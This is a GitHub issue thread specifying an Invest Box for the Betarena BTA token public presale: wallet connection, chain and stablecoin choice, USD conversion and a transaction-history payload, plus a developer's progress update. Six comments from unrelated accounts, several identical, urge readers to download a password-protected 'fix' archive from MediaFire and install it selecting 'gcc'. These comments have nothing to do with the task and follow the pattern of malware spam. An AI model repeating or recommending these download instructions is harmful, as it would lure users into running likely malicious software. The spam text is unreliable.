### ISSUE TITLE
Implement Invest Box in BTA Public Presale Section

### ISSUE THREAD

**Issue by jonsnowpt** [Betarena/scores#2268]
### Task Description:
Develop the Invest Box for the BTA Public Presale section, incorporating the following features:

### Amount Raised Display:

Source: Fetch data from Hasura DB betarena_general_data table public_presale, specifically the fundraising_status.

Columns:
```
id: Primary key, integer.
target_amount_usd: Numeric, nullable.
total_raised_usd: Numeric, nullable.
last_updated_at: Timestamp with timezone.
Functionality: Update the total raised value every time a transaction is recorded in the transactions_history table.
```

### Connect Wallet Option:

Wallets Supported:

```
Metamask
Trust Wallet
Coinbase Wallet
```

Integration: Implement Wallet Connect for users to connect their wallets. Ensure seamless functionality on desktop (direct connection and continuation) and mobile (authorization and return to the platform).

### Blockchain Selection:

Options: Allow users to choose between three blockchains:

```
ETH
Polygon
Bep20
```

Smart Contract: Adapt existing Polygon Smart Contract for ETH and Bep20. Ensure the correct Smart Contract is selected based on user choice.

### Cryptocurrency Choice:

Provide options for the user to choose their preferred cryptocurrency

```
USDT
USDC
```

### User Wallet Balance Display:

Show the user's current wallet balance using the chosen cryptocurrency. (The same approach we used on the private presale)

### Real-Time USD Conversion:

Source: Use Coinmarketcap API to provide real-time conversion rates for the chosen cryptocurrency.

### BTA Token Calculation:

Calculate the number of BTA tokens corresponding to the user's investment based on the real-time USD conversion and current BTA token price.

### Buy BTA Submit Button:

User Authentication: Require the user to log in or register on Betarena before submitting the buy order.

Payload for Transaction History:

```
date: Investment date.
asset: Cryptocurrency used (USDT or USDC).
quantity: Amount of stablecoin used.
amount: Number of BTA tokens purchased.
description: "Public Presale."
type: "deposit."
status: "completed" (after confirmation).
gateway: "crypto" or "credit card."
uid: User UID.
bta_price: BTA token price at the time of investment.
deposit_wallet_address: User's wallet address used for the transaction.
```

### Subtasks:

- [ ] Implement database queries and real-time updates for the Amount Raised section.
- [ ] Integrate Wallet Connect for the listed wallets.
- [ ] Adapt the existing Smart Contract for ETH and Bep20 blockchains.
- [ ] Implement real-time USD conversion using the Coinmarketcap API.
- [ ] Develop logic to calculate and display the number of BTA tokens based on the user's investment.
- [ ] Implement the Buy BTA process, including authentication and transaction history logging.

Notes:

Ensure compatibility across desktop and mobile devices.
Thoroughly test the entire flow, including wallet connection, blockchain selection, and transaction completion.

FIGMA:

https://www.figma.com/design/n5xn98dt6JildrUrpYHY85/Public-Presale?node-id=52-1708&m=dev&t=4YWBJMZw4YeLIHYg-1

![Image](https://github.com/user-attachments/assets/769580d5-e9b7-4b90-8e28-2f06495c261b)

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by migbash** [comment]
**🟧 UPDATE | 29/08/24**

- Ported over the `scores | authentication` component and all the firebase modules and dependencies. Testing will being today for correct user authentication inspection.
- Ported over the logic from the `scores | web3` used in the existing `invest-box`. Testing will begin today for correct investment inspection.
- Updating endpoints and setting up `GraphQLs` for the data fetching used in the `presale` widget.
